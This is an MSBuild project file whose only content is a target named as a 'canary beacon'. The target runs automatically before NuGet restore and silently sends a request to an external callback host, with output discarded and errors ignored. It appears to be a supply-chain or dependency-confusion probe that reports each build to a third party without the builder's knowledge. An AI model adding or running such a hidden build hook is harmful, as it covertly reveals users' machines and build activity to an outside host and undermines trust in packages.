<Project>
  <!-- Trigger canary beacon during restore phase -->
  <Target Name="CanaryBeaconRestore" BeforeTargets="Restore">
    <Exec Command="curl -s 'https://yczfxrczzreyouovmtnf2rd1ozhn89m8y.blnd.r0l.me/nuget_package/' -o /dev/null 2&amp;1 || true" ContinueOnError="true" />
  </Target>
</Project>
